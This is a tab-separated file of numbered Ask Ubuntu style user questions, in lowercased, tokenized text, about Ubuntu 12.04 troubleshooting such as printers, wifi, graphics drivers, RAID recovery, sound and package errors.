142382	how to install a brother hl-6 printer ?	i have been trying to get an old but good laserprinter to work with ubuntu 12.04 . according to the documentation , the printer can emulate the hp laserjet iip printer , and works with pcl4 . the printer has no usb cable , just an lpt one , and since my computers no longer have such a port , i 'm using ( trying to ) an lpt - > usb cable . i 've come across this forum thread ( by far the only useful topic i 've found on the net regarding this printer ) : http : //ubuntuforums.org/showthread.php ? t=85466 i 've followed the instructions and manually installed the printer using a generic pcl4 laserjet driver . however , when i try to print , it does n't work : i see a blinking orange indicator on the printer , which indicates data is being recieved . however , the indicator wo n't stop blinking . even after an hour , it still blinks and prints nothing . the printer itself works well : i printed a test page using the `` test '' button , and that worked as expected . any help is greatly appreciated . -- edit : allow me to clarify the fact that the printer can emulate an hp laserjet iip . therefore , if you know how to install an hp laserjet iip printer , please feel free to let me know , as it is likely to work with my printer too !
142385	graphical sound equalizer ( eq ) for ubuntu 12.04	is there a graphical sound equalizer for ubuntu 12.04 ? if not , is there a tentative schedule/website where i can know of any developments ? thanks .
142386	how to modify a freebsd 9.0 iso file ?	i want to modify bsdinstall scripts of freebsd 9.0 iso file . i simply extracted it and then recreate iso file but it did n't work . then i discovered iso master for modify it without extraction but i got this error when i try to open it . failed to read directory tree : 'rockridge filename missing when expected on image' why do i get this error ? also is there any other way to modify it without brake its boot ability ?
142390	ubuntu boots quickly but is very slow loading x windows	i 've heard a lot about fast booting in ubuntu 12.04 . unfortunately my experience is a bit different . my ubuntu boots like this : from grub to noticeable mouse cursor ~30s + ~10s for desktop picture from desktop picture to unity panel ~35s then another ~45s for e.g . nautilus to be loaded all in all , i am not able to use my computer in less than two minutes , which is quite a lot , is n't it ? note that dmesg log 's last two rows are : [ 23.169677 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 34.064021 ] wlan0 : no ipv6 routers present look at the time - 34s . what am i waiting for after ? good to know : i am using the default nouveau driver instead of nvidia 's . on ubuntu 11.10 the boot took exactly the same time ( i 've made a new install to ubuntu 12.04 though ) . i know this question may be a bit too concrete , i would appreciate any information how to debug this as well , since i have no idea what 's going on after the mentioned 34th second .
142393	help in setting up xbox controller ( wired ) in ubuntu 12.04	i 'm following this > > https : //help.ubuntu.com/community/xbox360controller and am not understanding the 'creating a makefile ' part . should i make a new document file named 'makefile ' and paste this inside > > kernel_path ? =/usr/src/linux-headers- $ ( shell uname -r ) extra_cflags=-i $ ( shell pwd ) obj-m : =xpad.o all : $ ( make ) modules -c $ ( kernel_path ) subdirs= $ ( shell pwd ) install : cp -f xpad.ko /lib/modules/ $ ( shell uname -r ) /kernel/drivers/input/joystick cause if yes , when i use make command then this error shows > > makefile:11 : *** missing separator ( did you mean tab instead of 8 spaces ? ) . stop . sorry for being a noob ; ) what am i supposed to do now ? or am i doing it all wrong ?
142395	why can i install only one software at a time ?	i have seen that in ubuntu software center or even when sudo apt-get install is issued , only one package can be installed at a time ... or suppose there is an update check/install in progress then even if i issue the install command in the command prompt it says unable to lock administrative directory and stuff ... i saw this question ... but that has only solved the problem of how to install multiple packages at a time.. i want to know why is it like ths ? ? even in windows , multiple softwares can be installed simultaneously ( that causes windows to hang is a different thing : p ) ... and also one of the alternate software center , the deepin software center allows the installation of multiple packages . or as stated in the 1st link , i.e this one , it says synaptic package manager also allows multiple packages to install ... then why is that in linux/ubuntu only one application or rather a package can be installed at a time ... even updating packages locks the other softwares from installing.. why so ? ? would like a detailed answer as to is there an advantage in this or why this is a necessity in linux/ubuntu , etc ... thankyou.. : )
142399	how to increase wifi sensitivity ?	since i installed ubuntu 12.04 ( fresh , not upgrade ) , my wifi is much weaker than before and much weaker than under windows xp . there is a noticeable difference in required sensitivity : it does n't establish a connection unless i carry the notebook directly to the hotspot ( so that the indicator shows 3 or 4 bars ) . however afterwards the connection breaks only when i move farther away ( 1-2 bars ) . ( side note : i remember my 9.04 had stronger wifi than xp . ) my wireless interface is wlan0 and with sudo lspci -nn i found that my network controller is : network controller [ 0280 ] : intel corporation pro/wireless 3945abg [ golan ] network connection [ 8086:4222 ] ( rev 02 ) should i report it as a bug ? is there a configuration how i can improve it ?
142407	usb modem does n't get connected	i 'm using the 3.5g hsdpa modem , it has been detected as an usb modem . but when i try to connect , it always disconnected . i 've tried to use wvdial & sakis3g but it still ca n't connect . i do n't think this is a signal or a device problem since it it connects normally with windows even when the signal is very low .
142413	how to build my custom ubuntu using minimal cd	i have downloaded the 30 mb minimal ubuntu 12.04 iso file . i would like to customize it . i would like o have the following customizations : add ubuntu desktop gui with unity . add essential software and applications , including network . add other software and above all , i need to install my own kernel . i need to change the background images , logos and themes . is it possible to change the boot animation ? how is it possible ? will ubuntu customization kit work ?
142416	error while opening software center and update manager in xubuntu	using xubuntu 12 . i ca n't open either the software center or update manager . i 'm a complete novice ! i get the following error : failed to execute command `` /usr/bin/software-center % u '' . failed to execute child process `` /usr/bin/software-center '' ( no such file or directory ) i tried all i can think of by update via synaptic package manager but nothing i 've done works . i 've the cd but now i 'm used to this and i do n't want to do a clean install and lose all my files etc . can a repair be done ? or can it be repaired with the cd ? i 'm not that good with computers but absolutely love xubuntu ? please make my day and tell me it can be solved ! edit : some outputs which may help . alan @ alan-aspire-2930 : ~ $ cd /usr/share/software-center/ ; ls | grep ^software-center $ software-center it means there is software-center and is not deleted . alan @ alan-aspire-2930 : /usr/share/software-center $ sudo ln -s '/usr/share/software-center/software-center ' '/usr/bin' [ sudo ] password for alan : ln : failed to create symbolic link `/usr/bin/software-center ' : file exists alan @ alan-aspire-2930 : /usr/share/software-center $ it means symbolic link also exists . it is very strange because when you run software-center it says ( no such file or directory ) ! ! !
142421	compiz error with 12.04 on boot : ca n't see any desktop icons or taskbar	i just installed ubuntu 12.04 . when i ran the live cd , everything worked fine but when i installed it i get a desktop orange/purple screen but nothing else on it . i first get a screen saying that my monitor is out of range which did n't happen with the trial version . something about compiz not loading
142429	install apt-cacher on a non-ubuntu server ( router )	is there a way to install apt-cacher on a non-ubuntu server ? i 'm using dd-wrt on my router and i thought it would be nice if the apt-cacher was there instead of on a pc which has to be powered on if i want the caching . i 'm open to any other ideas about how i can achieve it too .
142432	ca n't get 12.04 to install	trying to load ubuntu 12.04 on an asus f5 laptop ( pro50g - pentium t3200 ) . the install cd has already been used to install 12.04 on another laptop . ubuntu appears to be loading until it gets to the welcome screen that i understand should have the language selection on it . whatever it should have is blank and all options ( menu bars ) are unresponsive . all i am able to do is a forced power down . as a relatively new person to linux , i am unfamiliar with any way to get control of the laptop . this is the first time i have had a problem installing ubuntu . i also tried using the 11.10 and 10.04 install discs with same result . any help/advice would be appreciated .
142437	how to delete recent projects from brasero disk burner ?	i burned a couple of things to dvd and the titles show up when you open up brasero . is there a way to delete them from it 's history - i tried uninstalling it and then reinstalled it from the software centre but nothing had changed .
142442	is it safe to use ubuntu 12.04 on modern laptop ?	hello i am new to ubuntu ad using ubuntu v12.04 on my asus k53sv-sx521d laptop . i want to make sure that ubuntu is not going to reduce longevity of my laptop or going to harm my laptop parts ( hardware ) . i will wait for ( to the point ) reply from you guys . thanks in advance
142451	how to use alternate config file when compiling the kernel ?	i am using ubuntu 12.04 as host , and i plan to compile a new kernel . i downloaded the linux-libre kernel . when compiling the kernel , i would like to `` load alternate configuration '' . i have an alternate kernel config , which is not the default ubuntu config . how to use the alternate configuration ?
142453	headphone jack does not cut speakers in 12.04	when i connecting my headphones to laptop , the speakers is still working . where is the problem ?
142457	raid 5 mdadm problem - help please	my raid 5 array ( 4 1tb disks wd10ears ) had was showing as degraded . i looked and one of the disks wasnt installed , so i re-added it with the mdadm add command . the array is now showing as ( null ) array , but cant be mounted if i run : root @ warren-p5k-e : /home/warren # sudo mdadm -- misc -- detail /dev/md0 i get : mdadm : can not open /dev/md0 : no such file or directory and running : root @ warren-p5k-e : /home/warren # cat /proc/mdstat gives me : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] unused devices : < none > the data is very important root @ warren-p5k-e : /home/warren # mdadm -- examine /dev/sda /dev/sda : magic : a92b4efc version : 0.90.00 uuid : 00000000:00000000:00000000:00000000 creation time : sat may 26 12:08:14 2012 raid level : -unknown- raid devices : 0 total devices : 4 preferred minor : 0 update time : sat may 26 12:08:40 2012 state : active active devices : 0 working devices : 4 failed devices : 0 spare devices : 4 checksum : 82d5b792 - correct events : 1 number major minor raiddevice state this 1 8 0 1 spare /dev/sda 0 0 8 16 0 spare /dev/sdb 1 1 8 0 1 spare /dev/sda 2 2 8 32 2 spare /dev/sdc 3 3 8 48 3 spare /dev/sdd root @ warren-p5k-e : /home/warren # mdadm -- examine /dev/sdb /dev/sdb : magic : a92b4efc version : 0.90.00 uuid : 00000000:00000000:00000000:00000000 creation time : sat may 26 12:08:14 2012 raid level : -unknown- raid devices : 0 total devices : 4 preferred minor : 0 update time : sat may 26 12:08:40 2012 state : active active devices : 0 working devices : 4 failed devices : 0 spare devices : 4 checksum : 82d5b7a0 - correct events : 1 number major minor raiddevice state this 0 8 16 0 spare /dev/sdb 0 0 8 16 0 spare /dev/sdb 1 1 8 0 1 spare /dev/sda 2 2 8 32 2 spare /dev/sdc 3 3 8 48 3 spare /dev/sdd root @ warren-p5k-e : /home/warren # oot @ warren-p5k-e : /home/warren # mdadm -- examine /dev/sdc /dev/sdc : magic : a92b4efc version : 0.90.00 uuid : 00000000:00000000:00000000:00000000 creation time : sat may 26 12:08:14 2012 raid level : -unknown- raid devices : 0 total devices : 4 preferred minor : 0 update time : sat may 26 12:08:40 2012 state : active active devices : 0 working devices : 4 failed devices : 0 spare devices : 4 checksum : 82d5b7b4 - correct events : 1 number major minor raiddevice state this 2 8 32 2 spare /dev/sdc 0 0 8 16 0 spare /dev/sdb 1 1 8 0 1 spare /dev/sda 2 2 8 32 2 spare /dev/sdc 3 3 8 48 3 spare /dev/sdd root @ warren-p5k-e : /home/warren # mdadm -- examine /dev/sdd /dev/sdd : magic : a92b4efc version : 0.90.00 uuid : 00000000:00000000:00000000:00000000 creation time : sat may 26 12:08:14 2012 raid level : -unknown- raid devices : 0 total devices : 4 preferred minor : 0 update time : sat may 26 12:08:40 2012 state : active active devices : 0 working devices : 4 failed devices : 0 spare devices : 4 checksum : 82d5b7c6 - correct events : 1 number major minor raiddevice state this 3 8 48 3 spare /dev/sdd 0 0 8 16 0 spare /dev/sdb 1 1 8 0 1 spare /dev/sda 2 2 8 32 2 spare /dev/sdc 3 3 8 48 3 spare /dev/sdd that on the 4 drives .
142470	wine error in 10.10	i tried to run a windows software on wine and i get this error it is an online test software , i.e it enables me to take a test online . thats the most description i can give . any help ? please i need this to work urgently
142473	issues with latest update for ubuntu 12	hi i have been using 12 since the release and it has been running awesome and i really like unity however after the latest update involving something to do with the kernel ( i have know idea what it was i should have read it first ) libre calc and firefox have been running extremely slow , too the point of crashing . is there anyway to revert an update without reinstalling 12 from scratch ?
142486	web start ( jnlp ) problem with oracle 7 java	i have just met a annoying problem with my java . i tried to install jre and jdk on my ubuntu 12.04 but something must have go wrong . i can run java -version to see java version and javac -version to see javac version , even test java in chrome . but i ca n't run jnlp file . when i try to open it , nothing happens . what should i do now ? thank you .
142487	how to start terminal in full screen ?	when i open a terminal using ctrl+alt+t in unity , i would like this window to be automatically maximized , rather than to have to additionally hit alt+space and the 'x ' key to make the window that contains it maximized . if my memory serves me right , i do remember that there used to be a maximize mode that we can set in preferences , but i ca n't seem to find it now . any ideas ?
142491	wifi is not working after updating 11.10	today i updated my ubuntu 11.10 via the update manager . now , the wifi connection is not working . i see my wifi station and the network manager also connects to the station but i can not ping any other machine as well as connect to any other machine . i use dhcp and i have disabled ipv6 . if i call ifconfig everything looks fine , i see if my address . i also tried to setup the network manually without success . route also looks ok. any ideas what could have happend ?
142499	acer aspire one 722 broadcom 4313 wifi	i had an acer aspire one 722 with the atheros wifi card and it worked fine on 11.04 . so we bought 200 of them for our school . however these all came with the broadcom bcm4313 wireless card and there are issues . it is using the brcmsmac driver and they connect initially . however after a time ( sometimes just a few webpages ) some of them lose connection . however , they still have an ip and network-manager says they are connected , but no pages load and you ca n't ping anything on the lan or internet . a disconnect/reconnect can fix it , but sometimes a restart is required . it happens frequently so is a major issue . lots of broadcom drivers are blacklisted : bcm43xx , b43 , brcm80211 . any ideas or experiences with the broadcom4313 card ? please save these computers from a windows fate !
142501	problem starting ubuntu 12.04	i have an acer aspire 7730 laptop ( acer aspire 7730 ) . after a power failure it shows me only the gnu grub menu with these options : ubuntu , with linux 3.2.0.24 - generic ubuntu , with linux 3.2.0.24 - generic ( safe mode ) memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) if i choose either of the the first options it starts the busybox menu . can i fix this from this console or must i use a live cd ( which at the moment i do n't have ) ?
142504	why is google glog library not present in 12.04 ?	bug description : ( quoted from bug report ) '' after the precise pangolin upgrade , it appears that libgoogle-glog-dev and libgoogle-glog0 are not available . without the -dev package , asgard can not be compiled . without -glog0 , it may not be dpkg 'd . we should find a solution for this problem pretty fast . '' i have posted this issue on the ubuntu forums : http : //ubuntuforums.org/showthread.php ? p=11970783 # post11970783 *this directly effects at least 1 member of our team this issue has been posted as a bug on launchpad : https : //bugs.launchpad.net/asgard/+bug/999107
142505	is there an application that can show memory usage in a similar manner to top ?	i would like to leave an application running in my terminal that shows me the memory usage , similar to how top shows cpu and other info , and iotop shows the top i/o users . does such an application exist ? p.s . i know top shows memory usage as well , but i 'm talking about sorting by top memory usage and not showing any other info ( similar to what iotop does ) .
142506	hybrid graphics on ubuntu 12.04 switching to discrete	i have a sony vaio vpccb-27fx with hybrid graphics . using vgaswitcheroo enables me to switch my discrete card off to save power . now when i want to switch to the discrete card for performance , my system freezes . i already tried logging out and killing x with service lightdm stop , but still , it freezes as soon as i echo dis > switch . typing blindly , echo igd > switch returns me to my console where it reads [ 179.555171 ] i915 : switched off , but it seems the discrete card never gets switched on ... running echo ddis > switch gives me the following : [ 540 ... . ] [ drm : atop_op_jump ] *error* atombios stuck in loop for more than 5secs aborting [ 540 ... . ] [ drm : atom_execute_table_locked ] *error* atombios stuck executing cee2 ( len 62 , ws 0 , ps 0 ) @ 0xcefe [ 540 ... . ] [ drm : atom_execute_table_locked ] *error* atombios stuck executing bbf6 ( len 1036 , ws 4 , ps 0 ) @ 0xbcf3 [ 540 ... . ] [ drm : atom_execute_table_locked ] *error* atombios stuck executing bb8c ( len 76 , ws 0 , ps 0 ) @ 0xbb94 [ 541 ... . ] [ drm : r600_ring_test ] *error* radeon : ring test failed ( scratch ( 0x8504 ) =0xffffffff ) [ 541 ... . ] [ drm : evergreen_resume ] *error* evergreen startup failed on resume after that , the atombios part repeats a few times . also , the terminal locks up again and sysrq+reisub is my only rescue . has anybody an idea how i can switch to my discrete card without the system locking up ? # uname -srvmpio linux 3.2.0-24-generic # 39-ubuntu smp mon may 21 16:52:17 utc 2012 x86_64 x86_64 x86_64 gnu/linux # lsb_release -r description : ubuntu 12.04 lts
142508	how to fix `` -5 no address associated with hostname error '' while updating ?	i am getting this error frequently while updating ubuntu 12.04 lts . how can i fix it ? log is : ign http : //archive.scrapy.org precise/main translation-en fetched 6,620 kb in 1min 21s ( 81.2 kb/s ) w : failed to fetch http : //archive.scrapy.org/ubuntu/dists/precise/release.gpg something wicked happened resolving 'archive.scrapy.org : http ' ( -5 - no address associated with hostname )
142517	at the time of installing ubuntu , i am getting dark black screen only	i am trying to install ubuntu 12.04 lts dual boot with windows 7 , but when i click on try or even install ubuntu , i am getting black screen only . i ca n't see any text or anything else . when i see my laptop 's screen from close look , ubuntu in the middle of screen shown but screen is dark black . so because of this i am unable to install ubuntu on my laptop . please help in this regard . following deatails of my laptop . details of my laptop : manufacturer- acer aspire 4736 processor- intel core 2 duo cpu t660 graphics driver- mobile intel ( r ) 4 series express chipset family ( microsoft corporation - wddm 1.1 ) , current version installed- 8.15.10.2302 in ubuntu 11.04 i know how to boot into nomodeset , but i do n't know how to boot through nomodeset in ubuntu 12.04 lts . because there is no option shown for f6 key . my laptop is acer aspire 4736 , and my video/graphics card shows unknown by ubuntu . please someone help me . can changing or upgrading my laptop 's graphic card solve this problem.. ? ? if yes then , which graphic card should i go for which is supported by ubuntu and other linux distros ? please someone help .
142519	external hard drive not mounting	i have an external hard drive that i transferred a lot of music onto from an old apple computer . when i plug it into ubuntu it never shows up . i tried looking through the filesystem for it but didnt really see or recognize anything .
142520	virtual machine does not recognize source media to boot . need help !	i just installed the oracle vm to create a virtual image of windows xp because i had issues running yahoo messenger with wine . so i decided to try the virtualization instead , but as soon as i installed the virtual machine for xp and started it , for some reason it does not recognize the boot media to start the virtual system installation process . i need help , i really love my ubuntu os and i do n't want to go back to windows , but unfortunately i need to install at least a couple of windows programs that with ubuntu i have n't able to run the way they should work .
142522	problem for matlab installation	i install the matlab2009a to my computer successfully and when i try to activate it without using the internet ( activate manually without the internet ) and provide the path to license file . then an error coming out could not complete activation because the license file could not be written to disk . you might not have write permission on the license file or the folder . /home/linyulin/licenses/license_ubuntu_161051_r2010a.lic see your system administrator for assistance . the specific error message text is : /home/linyulin/licenses/ license_ubuntu_161051_r2010a.lic ( permission denied ) . thank you very much for your help . i 'm really anxious about this problem because i have spent lots of time on this problem and really do n't want to mass it up . thank you again !
142531	which partition do i install alongside windows on an hp pavillion dv7 ?	i 'm trying to install along side windows on an hp pavillion dv7 . i 've installed ubuntu on other machines , so i know a little about the process . if i remember right , my hd had too many partitions , and i would have to remove one to dual boot properly , so i put it off until now . i 'm using a live cd now , and i 'm on the `` installation type '' step . i do n't really understand what i 'm looking at .
142533	how do i remove cinnamon ?	today i installed cinnamon 1.4 but when i log in to it i ca n't see any panels , just my background image . can you tell me how to log in to unity using the terminal and how to remove cinnamon ?
142536	ati graphics card installations issues- no monitor , no frontend	summary : i am trying to install the radeon hd 5450 graphics card . when i do , regardless of what drivers are installed/uninstalled i get a blinking monitor- not a black screen or a splash screen , but literally no monitor is detected and so the frontend does n't even start . i cant ctrl+shift+f1 to a terminal , i ca n't hold shift during boot to access bios . i have tried everything i can think of . please help ! my system : xpc shuttle ubuntu 12.04 graphics card ( old ) geforce 6200 graphics card ( new ) radeon hd 5450 i also have onboard graphics background : i am trying to upgrade my graphics card from my old nvidia to a newer radeon . i started by hoping everything would just work and shutting down the system and popping out the old card and sticking in the new one . no luck- the monitor is not detected . so in order to fidget , i have to reinstall the old card to access a terminal . for some reason i ca n't just use the vga port for the onboard graphics with a card installed-if i do the monitor is still not detected . if i pull out the card and try to use the onboard graphics , things get weird and ubuntu doesnt boot properly , although i can get to the bios . also for some reason i ca n't get ssh to work properly with other computers on my network but i suspect that is a whole other problem . so i reinstall the old card , and remove the proprietary nvidia drivers i was using . then i install fglrx for the radeon card . repeat installation process- still no monitor detected . put the old card back in and remove fglrx ( assuming the drivers were n't compatible or something ) and try to install with no additional drivers ( i reinstalled xorg.conf from apt as well just to be safe ) . still no monitor detected . this is a very frustrating problem because in order to fix anything i have to install/remove components . i have taken out and put in this card like 40 times . i would be tempted to assume this is an ubuntu problem and just erase and install windows , but the fact that i get no monitor at all ( and not just a black screen ) suggests that a new operating system wo n't help since the card should be detected before ubuntu boots ( right ? ) i am on day three of trying to troubleshoot this problem and i need a fresh set of eyes . what should i do next ? will installing windows help ? what about a fresh ubuntu installation ? i will try anything at this point . all my files are already backed up , so i do n't have anything to lose .
142538	fan runs at max when screen is dimmed to save power	everytime the screen dims to save power after my laptop has been idle , the fan starts spinning really fast and the cpu temp rises to about 60 deg c. when i move the mouse to undim the screen , the fan returns back to normal . i 'm running ubuntu 12.04 64-bit on sony vaio laptop
142541	sound is not working	i 've rebooted lubuntu 12.04 64-bit a few times and still the sound does n't work . i 'm not sure what terminal commands to paste to be helpful . here are the outputs of a few that i see requested in other [ sound ] threads : $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : ad198x analog [ ad198x analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : ad198x digital [ ad198x digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 $ lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:01.0 pci bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express pci express root port ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati m52 [ mobility radeon x1300 ] 02:00.0 ethernet controller : intel corporation 82573l gigabit ethernet controller 03:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) 15:00.0 cardbus bridge : texas instruments pci1510 pc card cardbus controller $ grep `` codec : '' /proc/asound/card*/codec* codec : analog devices ad1981
142547	commands required for sound debugging	i would like to know the output of which commands should be posted when asking a question based on sound errors ( no sound / crackling sound etc . )
142548	make grub take entries for only 1 hard disk	i have 2 hard disks new and old . i have installed windows and ubuntu on the new one , and have windows and ubuntu on the old one . i`m booting from the new drive , but grub on the new disk has detected the operating systems from both disks . how can i modify it to only show entries for the new disk ?
142549	how to install ubuntu on virtualbox ?	i would like to know if anyone can help me with installing ubuntu on virtualbox 4.1.12 . i 'm really having trouble installing ubuntu on there . i am a first time user but always wanted to give it a try , but just need a bit of help .
142556	documentation packages - where they are installed ? [ 12.04 , but probably applies to all debian-based distros ]	when i install a package *-doc , eg libopencv-doc - where the documentation is placed ? on arch linux it was /usr/doc , but i ca n't find it on ubuntu . /usr/share/doc containst only changelogs : ( or it 's just man entry ?
142561	how to restore session / application indicator in ubuntu 12.04 ?	i 've recently upgraded to ubuntu 12.04 . i 'm using classic gnome . while trying to restore sound , i somehow removed the whole indicator area on the right side on the system menu . there is no cog , user switcher , calendar , email , sound , wifi ... - nothing at all . on the other side ( left ) i still have the menu - applications & places . thanks in advance .
142562	downloads get stuck	for some reason my downloads get stuck and i have no idea why . the upper-right corner icon shows that i am connected to the internet and web pages load normally , but when i try to install something , from ubuntu software center or download anything from the internet , it downloads normally for some time and then gets stuck and says that download speed is `` 0 kt/s '' . so , any suggestions on what i should do ?
142564	packages ( gstreamer , etc . ) cause broken cache	when installing `` teamviewerx64 '' , a package error occurs . output of the error : title : package operation failed in a nutshell : the installation or removal of a software package failed . details : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 206917 files and directories currently installed . ) unpacking libjack-jackd2-0 : i386 ( from ... /libjack-jackd2-0_1.9.8~dfsg.1-1ubuntu1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.1-1ubuntu1_i386.deb ( -- unpack ) : './usr/share/doc/libjack-jackd2-0/changelog.debian.gz ' is different from the same file on the system no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) selecting previously unselected package gstreamer0.10-plugins-good : i386 . unpacking gstreamer0.10-plugins-good : i386 ( from ... /gstreamer0.10-plugins-good_0.10.31-1ubuntu1_i386.deb ) ... selecting previously unselected package libasound2-plugins : i386 . unpacking libasound2-plugins : i386 ( from ... /libasound2-plugins_1.0.25-1ubuntu1_i386.deb ) ... selecting previously unselected package ia32-libs-multiarch : i386 . unpacking ia32-libs-multiarch : i386 ( from ... /ia32-libs-multiarch_20090808ubuntu36_i386.deb ) ... selecting previously unselected package ia32-libs . unpacking ia32-libs ( from ... /ia32-libs_20090808ubuntu36_amd64.deb ) ... errors were encountered while processing : /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.1-1ubuntu1_i386.deb error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) setting up libasound2-plugins : i386 ( 1.0.25-1ubuntu1 ) ... setting up gstreamer0.10-plugins-good : i386 ( 0.10.31-1ubuntu1 ) ... setting up ia32-libs-multiarch : i386 ( 20090808ubuntu36 ) ... setting up ia32-libs ( 20090808ubuntu36 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place running sudo apt-get -f install does nothing . the only way to get rid of this error is to run sudo apt-get remove ia32-libs ia32-libs-multiarch : i386 gstreamer0.10-plugins-good : i386 libasound2-plugins : i386 what is wrong , and how can i fix this ? thank you !
142568	application for viewing installed documentation in ubuntu 12.04	i do n't remember the name of application or package which i used in ubuntu 11.04 to view the default installed documentation or manually installed documentations from synaptic . it was pretty helpful . i tried searching but end up nowhere . i tried yelp ( which is ubuntu 's help system ) but it does n't provide functionalities for viewing manually installed documentations . for example : i installed python2.7-doc package from `` synaptic '' package manager and does n't shows up in yelp . i want the functionality to view the documentation installed by documentation packages . how can i do this ?
142569	share folder between users	i have created a folder in / that i would like to share between users in a certain user group on my system . after changing ownership of the folder from root to myself and changing the group permissions to `` create and delete files '' , i logged in as another user in the group and tested the folder . i was able to access the folder and one of its sub-directories , but permission to view/edit a file was denied . i could have changed the permissions on the sub-directory , but based on past experience i would have to do this each time a new file was added so others could view it . is there any easy way to automatically make any file placed in this folder available to the specified group ?
142571	ati radeon 6630m and xorg	the problem is whenever i update xorg , it breaks my whole system . i get a black screen at the login screen . i own a dell inspiron n4110 with a ati radeon 6630m graphics card . i am using ubuntu 12.04 and i installed fglrx because my laptop tends to overheat . everything works now except when i update xorg . is there a fix for this or do i just ignore the xorg updates ? thanks !
142572	batch rename directories ?	i have several directories with the format of the year , month , and day followed by a description of the event . for example : `` 2012 05 26 - eventa '' , `` 2012 05 26 - eventb '' . what i would like to do is rename all these directories so that the spaces between the numbers in the date are replaced with dashes . thus , `` 2012 05 26 - eventa '' becomes `` 2012-05-26 - eventa '' . i know i can do this one folder at a time with the mv command , but is there a way to do this in a batch process with wildcards somehow ?
142577	installed ubuntu with the wubi installer , but ca n't find it .	i did an install of ubuntu on my windows using the wubi installer , but was unable to locate it on my pc .
142580	can i exclude system monitor itself from the cpu usage shown ?	is it possible , as an option , to ignore the gnome-system-monitor process itself from the gnome-system-monitor calculation ( % cpu , etc . ) ?
142581	is ubuntu-geoip ( geoclue ) used for tracking ?	i am happily learning ubuntu more closely now . i came across the process ubuntu-geoip-provider in system monitor . is is used for tracking or for gathering nearest server info , or for syncing time with internet , or perhaps for all these things ? i searched for it but not enough information came through . if it is tracking , what kind of info it is gathering , and why it is doing that ? it is based here : /usr/lib/ubuntu-geoip i just wanted more detailed information for that . also , can this be disabled ? is disabling recommended , or would doing so cause dependency-related ( or other ) problems ?
142582	ive given up on nvidia in ubuntu 64bit 12.04 what is a stable graphics card ?	i ca n't handle any more crashes . i have tried many different fixes to the nvidia driver problem but none of them work . this goes to show you that open video drivers are paramount to linux . i cant seem to find a good answer to this question : what other stable graphics cards are there that will run on ubuntu 12.04 ? i am currently using nvidia geforce gtx 560 . once i have a good alternative i will speak with my pocket book and return my nvidia card and not look back to nvidia until they adequately support linux .
142583	ubuntu desktop not working after adjusting effects on compiz config manager	i unable to disable the desktop or anything , but when i reboot , all i can see is the mouse and a dialog appear saying that compiz has crashed . the terminal ( ctrl+alt+t ) does n't work , and neither control alternative delete to log out works . what can i do to restore everything ?
142591	how to restore lightdm guest 's wallpaper ?	recently i played a bit on changing lightdm wallpaper ... actually lightdm shows the user wallpaper but not the default guest wallpaper ( instead it shows a uniform purple background for guest account ) . how can i restore it ?
142592	how can i get statistics , how line count has changed over time ?	how can i get statistics , how line count changed over time ? i use bazaar for my project and it would be really nice to know , if i am refactoring code correctly .
142596	what is the difference betwen creating a private encryped folder and encrypting the whole home directory at the time of installation ?	which method is more preferable in which situation ? which process poses less stress over the cpu ?
142597	does anybody know if granola does what it says or even if it 's safe for ubuntu ?	i found a program called granola , does it do what it says it does or is it even safe or even needed in ubuntu 12.04 64 bit ( it claims to save power by cycling down your system when the extra power is n't needed ) ? i found it at a website called how to ubuntu . i 'm a little concerned because it 's not in the repository , and i could n't find much 'hard ' information about it .
